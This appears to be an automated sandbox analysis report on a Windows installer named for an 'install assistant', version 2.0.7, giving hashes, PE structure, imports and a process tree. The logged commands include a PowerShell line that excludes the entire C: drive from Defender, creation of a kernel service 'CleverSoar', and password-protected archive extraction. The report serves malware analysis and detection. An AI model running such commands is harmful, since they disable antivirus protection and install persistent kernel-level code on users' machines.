                                      SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                      Malicious:false
                                      Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.92104230937537
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 98.04%
                                      • Inno Setup installer (109748/4) 1.08%
                                      • InstallShield setup (43055/19) 0.42%
                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      File name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      File size:5'695'204 bytes
                                      MD5:b7289fd08cd04c771fd7c9b06477601a
                                      SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
                                      SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
                                      SHA512:3fa1db6989481a59d2a4c645f15f743c943e575e6ceba5eec0ddbe5bce4e394a10b1f83132385f350a139aecdbac4e78cf0d09346e46599dad7e92478071dd62
                                      SSDEEP:98304:XwREQQxJMpnJwpVM+bJr2CsBdh/vRXIXm25Kz4j2dMwZgW:ldJmngtrg/G26XcF
                                      TLSH:F9461213F2CBE03DE05E0B3B06B2A25494FB6A616526AD578AECB4ECCF351501D3E647
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:0c0c2d33ceec80aa
                                      Entrypoint:0x4a83bc
                                      Entrypoint Section:.itext
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:1
                                      File Version Major:6
                                      File Version Minor:1
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:1
                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFA4h
                                      push ebx
                                      push esi
                                      push edi
                                      xor eax, eax
                                      mov dword ptr [ebp-3Ch], eax
                                      mov dword ptr [ebp-40h], eax
                                      mov dword ptr [ebp-5Ch], eax
                                      mov dword ptr [ebp-30h], eax
                                      mov dword ptr [ebp-38h], eax
                                      mov dword ptr [ebp-34h], eax
                                      mov dword ptr [ebp-2Ch], eax
                                      mov dword ptr [ebp-28h], eax
                                      mov dword ptr [ebp-14h], eax
                                      mov eax, 004A2EBCh
                                      call 00007F95307472F5h
                                      xor eax, eax
                                      push ebp
                                      push 004A8AC1h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      xor edx, edx
                                      push ebp
                                      push 004A8A7Bh
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      mov eax, dword ptr [004B0634h]
                                      call 00007F95307D8C7Bh
                                      call 00007F95307D87CEh
                                      lea edx, dword ptr [ebp-14h]
                                      xor eax, eax
                                      call 00007F95307D34A8h
                                      mov edx, dword ptr [ebp-14h]
                                      mov eax, 004B41F4h
                                      call 00007F95307413A3h
                                      push 00000002h
                                      push 00000000h
                                      push 00000001h
                                      mov ecx, dword ptr [004B41F4h]
                                      mov dl, 01h
                                      mov eax, dword ptr [0049CD14h]
                                      call 00007F95307D47D3h
                                      mov dword ptr [004B41F8h], eax
                                      xor edx, edx
                                      push ebp
                                      push 004A8A27h
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      call 00007F95307D8D03h
                                      mov dword ptr [004B4200h], eax
                                      mov eax, dword ptr [004B4200h]
                                      cmp dword ptr [eax+0Ch], 01h
                                      jne 00007F95307DF9EAh
                                      mov eax, dword ptr [004B4200h]
                                      mov edx, 00000028h
                                      call 00007F95307D50C8h
                                      mov edx, dword ptr [004B4200h]
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .rsrc0xcb0000x110000x110009d61959cbf275c6bf6376c85f2d2fef4False0.18784466911764705data3.7213394898806054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                      RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                      RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                      RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                      RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                      RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                      RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                      RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                      RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                      RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                      RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                      RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                      RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                      RT_STRING0xd8e000x3f8data0.3198818897637795
                                      RT_STRING0xd91f80x2dcdata0.36475409836065575
                                      RT_STRING0xd94d40x430data0.40578358208955223
                                      RT_STRING0xd99040x44cdata0.38636363636363635
                                      RT_STRING0xd9d500x2d4data0.39226519337016574
                                      RT_STRING0xda0240xb8data0.6467391304347826
                                      RT_STRING0xda0dc0x9cdata0.6410256410256411
                                      RT_STRING0xda1780x374data0.4230769230769231
                                      RT_STRING0xda4ec0x398data0.3358695652173913
                                      RT_STRING0xda8840x368data0.3795871559633027
                                      RT_STRING0xdabec0x2a4data0.4275147928994083
                                      RT_RCDATA0xdae900x10data1.5
                                      RT_RCDATA0xdaea00x310data0.6173469387755102
                                      RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                      RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                      RT_VERSION0xdb2980x584dataEnglishUnited States0.2790368271954674
                                      RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                      DLLImport
                                      kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                      comctl32.dllInitCommonControls
                                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                      advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                      NameOrdinalAddress
                                      __dbk_fcall_wrapper20x40fc10
                                      dbkFCallWrapperAddr10x4b063c
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      No network behavior found

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:02:48:49
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
                                      Imagebase:0x240000
                                      File size:5'695'204 bytes
                                      MD5 hash:B7289FD08CD04C771FD7C9B06477601A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:02:48:49
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
                                      Imagebase:0x790000
                                      File size:3'366'912 bytes
                                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:02:48:50
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                      Imagebase:0x7ff788560000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:02:48:50
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:02:48:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:5
                                      Start time:02:48:56
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
                                      Imagebase:0x240000
                                      File size:5'695'204 bytes
                                      MD5 hash:B7289FD08CD04C771FD7C9B06477601A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:false

                                      Target ID:6
                                      Start time:02:48:56
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
                                      Imagebase:0x3d0000
                                      File size:3'366'912 bytes
                                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:02:48:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:02:48:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                      Imagebase:0x5a0000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal, Browse
                                      Has exited:true

                                      Target ID:11
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:12
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                      Imagebase:0x5a0000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:02:49:01
                                      Start date:23/12/2024
